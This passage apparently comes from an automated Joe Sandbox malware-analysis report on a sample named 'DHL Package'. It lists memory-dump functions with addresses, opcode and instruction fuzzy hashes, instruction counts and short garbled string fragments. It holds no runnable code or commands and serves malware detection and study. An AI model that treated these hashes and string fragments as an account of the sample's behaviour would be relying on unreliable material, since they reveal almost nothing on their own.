Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a615a5aa65a15f5edea0faa264d98eb3b654e11ff2f6b5e395104a46016552a8
Instruction ID: da9d47ba8c469322654ac17393ab66abd529bde6128f6ab92563c5eb3df517d7
Opcode Fuzzy Hash: a615a5aa65a15f5edea0faa264d98eb3b654e11ff2f6b5e395104a46016552a8
Instruction Fuzzy Hash: CE7195B5E01618CFEB68CF6AC944B9DBBF2AF89300F14C1AAD40CA7254DB345A85CF51

Function 0015B300 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5be2c66c6262b808c3247e5c365f8998d775af80207bee1de28cb822aae2627
Instruction ID: a5c94f5e5d680e9e6f58b364bceb3845de3b86c67da70d0479550f21f56d415d
Opcode Fuzzy Hash: d5be2c66c6262b808c3247e5c365f8998d775af80207bee1de28cb822aae2627
Instruction Fuzzy Hash: C761C674E00208DFDB58DFAAD884A9DBBF2BF89301F148069E819BB365DB345946CF50

Function 393AACF8 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de4cf9fdd1406a54f8150a8c9a4e7c2674ed6e45d37bde50ce8834a499512911
Instruction ID: d55bb5b85de7d5befef3cdfb1a590ca44afb1379b6cd8daa5fb868fcdd499d32
Opcode Fuzzy Hash: de4cf9fdd1406a54f8150a8c9a4e7c2674ed6e45d37bde50ce8834a499512911
Instruction Fuzzy Hash: 2341B2B1D002088FEB18DFAAC8547DEBBB2BF89304F14D56AD418BB294DB355946CF54

Function 393AD880 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c4924abe0d3dce26be72834afab4967712a6893d41560be798314b431b1ae0
Instruction ID: 24435842f609f028a181eb0e09bb674b4216c698ab92b66681e1b768118de724
Opcode Fuzzy Hash: 51c4924abe0d3dce26be72834afab4967712a6893d41560be798314b431b1ae0
Instruction Fuzzy Hash: 3B4178B1E016188BEB58CF6BC945799FAF3AFC9310F14C1AAC50CA6264DB740A86CF51

Function 393AB8FF Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 599631544902d3763d3f02b3abb9849782f6fc248f32b618529b6b4f352ac3e8
Instruction ID: 28799d0a41a63a210cfcd83c1b66e9465a1911a7dc4ecf31a65b90a660f28af3
Opcode Fuzzy Hash: 599631544902d3763d3f02b3abb9849782f6fc248f32b618529b6b4f352ac3e8
Instruction Fuzzy Hash: 0C416AB5E016188BEB58CF6BC945789FBF3AFC9300F14C1AAD50CA6254EB740A858F51

Function 393ADED0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a373199645a128d0770caccdda51170021d21bcd8006325a7dd387ebb3df6c75
Instruction ID: 830257616d6457651d52af1a0d12dd8781c4e4712de9c8341d5cd4fa0d6b64e2
Opcode Fuzzy Hash: a373199645a128d0770caccdda51170021d21bcd8006325a7dd387ebb3df6c75
Instruction Fuzzy Hash: 53416AB5E016188FEB58CF6BC9457D9FAF3AFC9304F14C1AAC50CA6264DB740A868F50

Function 393AD234 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 082df3df2c840492177f6d8e7a9a10c2bdea14f8b90f1e66b70bde0f93ef5d9c
Instruction ID: 22eeba2629e5d06f90b5b84ead596e5149d353d9127caaae18c3a287e0cb26e0
Opcode Fuzzy Hash: 082df3df2c840492177f6d8e7a9a10c2bdea14f8b90f1e66b70bde0f93ef5d9c
Instruction Fuzzy Hash: 974167B1E016188BEB58CF6BC9457D9FAF3AFC9310F14C1AAC50CA6264DB740A868F51

Function 393ACBEC Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e753627e5dbf4e5b717b3db7a9af575538657b34a6ce579518aa2d5fbb27cfc
Instruction ID: 52d8924e28b919206d46b5c6a767ff3cdf1e312bc28dd093f812fac832b58c89
Opcode Fuzzy Hash: 7e753627e5dbf4e5b717b3db7a9af575538657b34a6ce579518aa2d5fbb27cfc
Instruction Fuzzy Hash: 214128B5E016188BEB58CF6BC945799FAF3AFC9300F14C1AAD50CA6264DB740A858F51

Function 39380D51 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51651539dd663d5e0bf55b34cfd0e82c0507f8f4d1447e1ca814451595311e87
Instruction ID: a63a3c90050cc17ac852a1e728f80c6c1ab8eeed7f7fd5624bdfa1b35bdf396a
Opcode Fuzzy Hash: 51651539dd663d5e0bf55b34cfd0e82c0507f8f4d1447e1ca814451595311e87
Instruction Fuzzy Hash: E841C1B4D05648CBEB18CFEAC9546DEBBB2BF89300F20D12AC419AB265DB345946CF50

Function 00150F28 Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

"6, xrefs: 0015109F
H#6, xrefs: 001510E3
"6, xrefs: 00151099

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID: H#6$"6$"6
API String ID: 0-431601916
Opcode ID: 52a63796c46ce9003ca4cd93d9a2e3a080ae3182cd8178b98565fa6fa1dccae5
Instruction ID: 234836ec1c7be67b1e4acfdb4cf0e199cd378ab2340bfcacac14fdb2ae76af04
Opcode Fuzzy Hash: 52a63796c46ce9003ca4cd93d9a2e3a080ae3182cd8178b98565fa6fa1dccae5
Instruction Fuzzy Hash: 9022F774E4121ACFDB95DF64DC96A8DBBB1BF8A301F1081A5E809A7350DB385E86CF41

Function 00150F30 Relevance: 4.1, Strings: 3, Instructions: 395COMMON

Download Yara Rule

Strings

"6, xrefs: 0015109F
H#6, xrefs: 001510E3
"6, xrefs: 00151099

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID: H#6$"6$"6
API String ID: 0-431601916
Opcode ID: b6ccfe73c9ca08e0a71b9e84191e7e7e41c10ce7b705028e88fa6e85ad6fc952
Instruction ID: fc53dfaf2a61e64f280ed001ef0a2a8d90d8ca129c4973c747708f8802c91e66
Opcode Fuzzy Hash: b6ccfe73c9ca08e0a71b9e84191e7e7e41c10ce7b705028e88fa6e85ad6fc952
Instruction Fuzzy Hash: E122F774E4121ACFDB95DF64D896A8DBBB1BF8A301F1081A5E809B7350DB385E86CF41

Function 3938C210 Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

D@, xrefs: 3938C5C1
D@, xrefs: 3938C553
D@, xrefs: 3938C416

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID: D@$D@$D@
API String ID: 0-3330130650
Opcode ID: 3b92e7233aea51dc8064205e23666997e35820bcc8ec89697085f2706c5c4922
Instruction ID: 1e4a2f50be92739ccfc2359cdefb3f553fa03d91e9945366a319e6053847c95f
Opcode Fuzzy Hash: 3b92e7233aea51dc8064205e23666997e35820bcc8ec89697085f2706c5c4922
Instruction Fuzzy Hash: 87C1B0B4E002299FEB64DF64C950BDEBBB2BB89300F1081E9D90DA7290DB745E85DF51

Function 3938C220 Relevance: 4.0, Strings: 3, Instructions: 232COMMON

Download Yara Rule

Strings

D@, xrefs: 3938C5C1
D@, xrefs: 3938C553
D@, xrefs: 3938C416

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID: D@$D@$D@
API String ID: 0-3330130650
Opcode ID: f4887d834199cca5d3e57a6edfb3eef01d76bc70c669bd97680d93e46a3ce889
Instruction ID: d3b1c9d5d078df2d73b96aba58397e7dc426d33c24c469cdee3e8c4e279492e6
Opcode Fuzzy Hash: f4887d834199cca5d3e57a6edfb3eef01d76bc70c669bd97680d93e46a3ce889
Instruction Fuzzy Hash: F1B1B0B4E002299FEB64DF68C850BDDBBB2BB89300F1081E9D90DA7290DB745E85DF51

Function 3938CA60 Relevance: 3.9, Strings: 3, Instructions: 139COMMON

Download Yara Rule

Strings

D@, xrefs: 3938CB61
D@, xrefs: 3938CC18
pn|q, xrefs: 3938CA0C

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID: D@$D@$pn|q
API String ID: 0-2805936707
Opcode ID: 55f5cd88fc953f368abf61b991d8970b0f5c27e14b5cf48603500e00210f9dcb
Instruction ID: 2fa0ba4b0b0268538a8b87b337b74c4947c51ff227a97eede2f6d1bcb96dc15e
Opcode Fuzzy Hash: 55f5cd88fc953f368abf61b991d8970b0f5c27e14b5cf48603500e00210f9dcb
Instruction Fuzzy Hash: 1951E1B4E042499FDB04DFA8C595AEEBBF2BF89300F20802AD405AB354DB346A45CF94

Function 39381E49 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

(ksU^, xrefs: 393820C4, 393820F7, 3938212A
, xrefs: 39381F45

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID: $(ksU^
API String ID: 0-2965780083
Opcode ID: db4f9460938538a2511df2113593b7be80ed3199d98f7f886bcf1e5b499400cb
Instruction ID: 9eaac152cae702b5071074994623bfd19fa6163d5c5c42f4f4c436137a30e7f0
Opcode Fuzzy Hash: db4f9460938538a2511df2113593b7be80ed3199d98f7f886bcf1e5b499400cb
Instruction Fuzzy Hash: 208116757082409FEF155FB4D85966E36A2EFC53A0F204329E9229B3E1CF359D46CB82

Function 3938CAB0 Relevance: 2.6, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

D@, xrefs: 3938CB61
D@, xrefs: 3938CC18

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID: D@$D@
API String ID: 0-548349879
Opcode ID: 2821c651ecdbf5fe0d133936d4a92633a757ddf9e501570d64eb46e68b6a5460
Instruction ID: 10d45480247950729ba6d5793cd6f162141f547db2d91f628abac454a640c711
Opcode Fuzzy Hash: 2821c651ecdbf5fe0d133936d4a92633a757ddf9e501570d64eb46e68b6a5460
Instruction Fuzzy Hash: 9751D4B4E012199FDB04DFA8C595ADEBBF2BF89300F20802AD405AB394D7346A45CF90

Function 39AC1809 Relevance: 1.9, Strings: 1, Instructions: 605COMMON

Download Yara Rule

Strings

;<(:^, xrefs: 39AC18B0, 39AC18B5, 39AC1C29, 39AC1C2E

Memory Dump Source

Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd

Similarity

API ID:
String ID: ;<(:^
API String ID: 0-3163794458
Opcode ID: 71978bf53a8d00921c9591e55d679e03af063e9b052525dc8c2b717c1c4a100a
Instruction ID: bfb31d173b575d336eac72750841a7d95f752fb2390230e8a20dfed2213c6d2c
Opcode Fuzzy Hash: 71978bf53a8d00921c9591e55d679e03af063e9b052525dc8c2b717c1c4a100a
Instruction Fuzzy Hash: 3D52B174A41228CFDB65DF64C855BDDB7B2FB89301F1081A9D849A7390CB395E82DF84

Function 39AC1807 Relevance: 1.9, Strings: 1, Instructions: 602COMMON

Download Yara Rule

Strings

;<(:^, xrefs: 39AC18B0, 39AC18B5, 39AC1C29, 39AC1C2E

Memory Dump Source

Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd

Similarity

API ID:
String ID: ;<(:^
API String ID: 0-3163794458
Opcode ID: 982381be4cfb706a7d9084050cbafa881a3bc57fd786766e8437ecffe46d64ee
Instruction ID: f3df0da16c7da6f8336ca2b5ceccfe054c30fb6bcc3e15ebfce5802f68f46953
Opcode Fuzzy Hash: 982381be4cfb706a7d9084050cbafa881a3bc57fd786766e8437ecffe46d64ee
Instruction Fuzzy Hash: C452B074A41228CFDB65DF64C855BDDB7B2FB89300F1081A9D849A73A0CB395E82DF84

Function 39AC1BBB Relevance: 1.7, Strings: 1, Instructions: 424COMMON

Download Yara Rule

Strings

;<(:^, xrefs: 39AC1C29, 39AC1C2E

Memory Dump Source

Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd

Similarity

API ID:
String ID: ;<(:^
API String ID: 0-3163794458
Opcode ID: ef3e120ab5709021f77806b31886192213711784a50e43f0ab9681abad927ca9
Instruction ID: b0e241ada8e5c84bbf865fd500c6b7283173b2bc31a3391eabbaef7f801ec3bb
Opcode Fuzzy Hash: ef3e120ab5709021f77806b31886192213711784a50e43f0ab9681abad927ca9
Instruction Fuzzy Hash: D922AF74A01228DFDB64DF64C955BDDBBB2BF89300F1081A9D849A73A0CB395E91DF44

Function 393823E0 Relevance: 1.6, Strings: 1, Instructions: 391COMMON

Download Yara Rule

Strings

(ksU^, xrefs: 39382440, 3938245A, 393825B6, 393825DB, 39382615, 3938263A

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID: (ksU^
API String ID: 0-2795648864
Opcode ID: add82dfe237d7844805ce24c394c21025fe08444528385ef273dfa8348be97ba
Instruction ID: 32daf218de543b6f5ce01a47249142fbed7f9fc47aa961ed8f044cb1edddb1fd
Opcode Fuzzy Hash: add82dfe237d7844805ce24c394c21025fe08444528385ef273dfa8348be97ba
Instruction Fuzzy Hash: 09D1F375B082448FDB05DFA8C490A9E7BF6EFCA360F154069E501DB3A1DA74EC45CBA1

Function 393A4AE0 Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

I[:9, xrefs: 393A4D1E

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID: I[:9
API String ID: 0-3709689739
Opcode ID: cfe942a31478d34a76344fa26982e5fffbcb6d86d6df84a037e82af9495077e5
Instruction ID: cc9b7477fb8b973bf07512483d64b78283380af656628a71cc695f893ed2722b
Opcode Fuzzy Hash: cfe942a31478d34a76344fa26982e5fffbcb6d86d6df84a037e82af9495077e5
Instruction Fuzzy Hash: 03818CB9B402158FE704DF38C858A5E7BF6FF89741B118169D006DB3A1DA34EC02CB91

Function 00155A16 Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

(ksU^, xrefs: 00155B35, 00155B9B

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID: (ksU^
API String ID: 0-2795648864
Opcode ID: 92ba08bb8c8f3c10ce0fc46d4b6e76bcd38b71dcd967b06561f24df945d6f8e7
Instruction ID: 85aebdc09c539fe4dc0cc1f416022938deab12f169df85358fc4021bdd324f95
Opcode Fuzzy Hash: 92ba08bb8c8f3c10ce0fc46d4b6e76bcd38b71dcd967b06561f24df945d6f8e7
Instruction Fuzzy Hash: E341B0307046408FEB199B74C8A4B3E7BA7AFC9301F14856CD9468B396DF798C06DB95

Function 001558B0 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

(ksU^, xrefs: 001559AC, 001559DF

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID: (ksU^
API String ID: 0-2795648864
Opcode ID: ee4da3bbdfde4717a877376d528c7a656604d7e42f30fdd5344927ec10f16701
Instruction ID: b08df8e8c5de3a4fdf6ed0c50f9da378f88ee6ddb899632c5e5837c2e4047f0f
Opcode Fuzzy Hash: ee4da3bbdfde4717a877376d528c7a656604d7e42f30fdd5344927ec10f16701
Instruction Fuzzy Hash: D941BD35204655DFEB068F24C824AAA7BB2FF8A315F068559EC559F391DB398C08CBA1

Function 39382B78 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

(ksU^, xrefs: 39382BF8, 39382C1F

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID: (ksU^
API String ID: 0-2795648864
Opcode ID: 486d25c45017c207747db47c0e0be2c22b4901cb8980f84eef78a6c8507a9256
Instruction ID: 54a333ffb34398ec44bf6bde0e09fd00335231e23770a319a4aa4594589fcc29
Opcode Fuzzy Hash: 486d25c45017c207747db47c0e0be2c22b4901cb8980f84eef78a6c8507a9256
Instruction Fuzzy Hash: 8331E871B042049FCB48DFB8C8559AE7BF5EF85341B20407DD505DB2A1DE358906CB90

Function 0015A46E Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

(ksU^, xrefs: 0015A57B

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID: (ksU^
API String ID: 0-2795648864
Opcode ID: 2e37d79a92580581227ff13bf95bfab2d7d303a3d4d71205c1612b69ee0cae2b
Instruction ID: 671e66da8fe2795f19f326627ec150ca5f9c3fba7850ab9ee5cde23d9e1a5e82
Opcode Fuzzy Hash: 2e37d79a92580581227ff13bf95bfab2d7d303a3d4d71205c1612b69ee0cae2b
Instruction Fuzzy Hash: 1F31D0317002449FDB049B64D864BAE7BF6BFCD300F148569E912EB391DF359C058BA1

Function 39382CB8 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

(ksU^, xrefs: 39382D01, 39382D28

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID: (ksU^
API String ID: 0-2795648864
Opcode ID: 314ea9e716ee7f317d4f494d7cd6678e0a5b5c2c5b93fb9cec80b284fb2f5406
Instruction ID: bcc6ebd9da5c624cfa26db45151a49ff2c748448250d5ce5080a357a5404a73e
Opcode Fuzzy Hash: 314ea9e716ee7f317d4f494d7cd6678e0a5b5c2c5b93fb9cec80b284fb2f5406
Instruction Fuzzy Hash: BE3127357092849FDB099B74C854A6E7FB6FF87340B2480BED4058B3A2CE355C0AC791

Function 39382178 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

(ksU^, xrefs: 393820C4, 393820F7, 3938212A, 393821FE

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID: (ksU^
API String ID: 0-2795648864
Opcode ID: a85d589c84fef802dd49dab87af4b97b8a6ead3659ac8e763e860068c8ee4591
Instruction ID: 89c89758c51778b23beaa4178601388a487eaf1158d31ad7cac29ae220829194
Opcode Fuzzy Hash: a85d589c84fef802dd49dab87af4b97b8a6ead3659ac8e763e860068c8ee4591
Instruction Fuzzy Hash: D821D0B570C2408FDB45DF78D86141A3BB5EB8A38036145AAE505CB3A2DF34ED06CBB1

Function 00151D68 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

T, xrefs: 00151D74

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID: T
API String ID: 0-2145084337
Opcode ID: dcbda9ab62a8f73f9d30c21136b28a066edcfe30c3a5cc0c438cfeefc69e935d
Instruction ID: dcccd97c618aba2e6b31d78d096ecd5fc8a88e7773e50506daf794f54dca43a4
Opcode Fuzzy Hash: dcbda9ab62a8f73f9d30c21136b28a066edcfe30c3a5cc0c438cfeefc69e935d
Instruction Fuzzy Hash: 2021F274D056098FDB41DFA8C9456EEBFF1BF4A300F10516AD809B7260EB341A89CFA2

Function 39382DC8 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

(ksU^, xrefs: 39382DEF

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID: (ksU^
API String ID: 0-2795648864
Opcode ID: 030a9ba1f8342fdca7973f12d923bb635059489462dd6bccb70810f2f1883cf3
Instruction ID: ca071e3d3f1f59760b65d44cd4c52cd0a979a81e6293cfc9a516c3777e23ddd8
Opcode Fuzzy Hash: 030a9ba1f8342fdca7973f12d923bb635059489462dd6bccb70810f2f1883cf3
Instruction Fuzzy Hash: 1901F53530C3846FC7062B74A81852A7FA6EFC7210F1444AFE945CB2A2DA25DC068756

Function 393A4CE8 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

I[:9, xrefs: 393A4D1E

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID: I[:9
API String ID: 0-3709689739
Opcode ID: 748c3ea5028209048ae4d1c740c8de388c939a92e3077f0747ff51b3bda9c57a
Instruction ID: 31048895dd133e145c642fe1d389fd38d7e6bfa8f10e5fb73dbbd8e3f01b0b35
Opcode Fuzzy Hash: 748c3ea5028209048ae4d1c740c8de388c939a92e3077f0747ff51b3bda9c57a
Instruction Fuzzy Hash: 8801E4B1E003198FDB44EFB9C80469EBBB5AF88341F10812AE419F7250EB385901CB90

Function 00159958 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 925975e2712618108aec23ea3dfffaa2eded1a460efda2eff25a71d017305a8c
Instruction ID: e2e626dfa3d5bf66ab096ed7cfb4d34d155550a8866a7c5b209ca5a828343cc8
Opcode Fuzzy Hash: 925975e2712618108aec23ea3dfffaa2eded1a460efda2eff25a71d017305a8c
Instruction Fuzzy Hash: 03423A31604205DFDB15CF68C984AAEBBF2BF88312F15855AE825DF2A1D734EC45CB62

Function 00157A08 Relevance: .6, Instructions: 595COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ee910c220e4c53498ec85909049e4e0e2ef4fb678671aca9b1822c83cec34e7
Instruction ID: 6f5f0c09e87bdf219258e3989fcf08e2c8a90806f6787f0a915ace39778df51d
Opcode Fuzzy Hash: 2ee910c220e4c53498ec85909049e4e0e2ef4fb678671aca9b1822c83cec34e7
Instruction Fuzzy Hash: EA421C34A002198FEB55EBE0C850BDEBBB2EF84300F1085A9D50A7B3A5CF355E95AF55

Function 00157070 Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cabae4961627925a04bcbe432abbcdc33df992dee94ada279c336a7502549be
Instruction ID: c2722863a23422397237ddcbeb875b789b4c9ed870b6f2a55afe297eb4efc75d
Opcode Fuzzy Hash: 5cabae4961627925a04bcbe432abbcdc33df992dee94ada279c336a7502549be
Instruction Fuzzy Hash: 19128A30A04605CFCB15CF68E885AAEBBF2BF88315F158599E869DF2A1D730EC45CB50

Function 0015A628 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8b07739746d1a7ad570cea22118d49f63c2c9971c48bb10e4a7cd048c83c3e6
Instruction ID: 59148fc79dfeba21f84034583c8a38c886a6c55f0b1f21b7a0308deb3ce3bcc7
Opcode Fuzzy Hash: d8b07739746d1a7ad570cea22118d49f63c2c9971c48bb10e4a7cd048c83c3e6
Instruction Fuzzy Hash: A4F13D75A40215CFCB04CFA8C9849ADBBF2FF88311B568169E915AB371DB34EC45CB51

Function 0015CB40 Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22866da07d4690b5a821169d823d7963cfb8485d68625e3bb9a5a93bdbd01771
